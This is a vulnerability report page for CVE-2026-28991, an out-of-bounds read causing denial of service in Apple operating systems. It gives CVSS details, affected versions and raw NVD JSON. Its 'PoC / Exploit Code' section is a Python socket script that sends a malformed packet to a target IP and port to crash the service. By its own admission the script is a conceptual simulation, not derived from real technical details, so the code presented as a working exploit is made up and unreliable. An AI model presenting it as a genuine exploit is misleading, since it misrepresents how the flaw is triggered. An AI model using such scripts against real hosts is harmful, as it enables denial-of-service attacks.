Security Vulnerability Report
中文
CVE-2026-28991 CVSS 7.5 HIGH

CVE-2026-28991

Published: 2026-05-11 21:18:59
Last Modified: 2026-05-13 14:07:53
Source: [email protected]

Description

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. An app may be able to cause a denial-of-service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
iOS < 26.5
iPadOS < 26.5
macOS Tahoe < 26.5
tvOS < 26.5
visionOS < 26.5
watchOS < 26.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-28991 (Conceptual) This script demonstrates a potential trigger for an Out-of-Bounds Read vulnerability. Note: This is a simulation based on the vulnerability description as specific technical details are reserved. """ import socket import sys def send_exploit_payload(target_ip, target_port): """ Attempts to trigger the OOB read by sending a malformed packet. """ try: # Establish connection to the vulnerable service print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Construct a payload that violates bounds checking # Header + Malformed Length Field causing OOB read magic_header = b"\x41\x41\x41\x41" # Length exceeds the expected buffer size (e.g., 0xFFFFFFFF) malformed_length = b"\xFF\xFF\xFF\xFF" padding = b"\x00" * 16 payload = magic_header + malformed_length + padding print(f"[*] Sending payload length: {len(payload)}") s.send(payload) # Wait for response or crash response = s.recv(1024) print("[+] Received response (service might still be running):") print(response) except ConnectionResetError: print("[!] Connection reset by peer. Possible crash detected.") except socket.timeout: print("[!] Connection timed out. Possible service hang detected.") except Exception as e: print(f"[!] Error: {e}") finally: s.close() if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python3 poc.py <target_ip> <target_port>") sys.exit(1) TARGET_IP = sys.argv[1] TARGET_PORT = int(sys.argv[2]) send_exploit_payload(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28991", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:18:59.017", "lastModified": "2026-05-13T14:07:52.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. An app may be able to cause a denial-of-service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "9D9FC2C4-7A7C-4330-A226-255428A5D18E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "0A70A5FD-8891-4C4E-9D35-F217F95027B5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "176C47FD-FA25-437B-9061-A81CAA367AEF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "C8F45D80-0DF8-444E-9AF1-703A1075F046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "057B244F-5485-4108-8E23-FE15F5256EE7"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127110", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127118", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127119", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127120", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.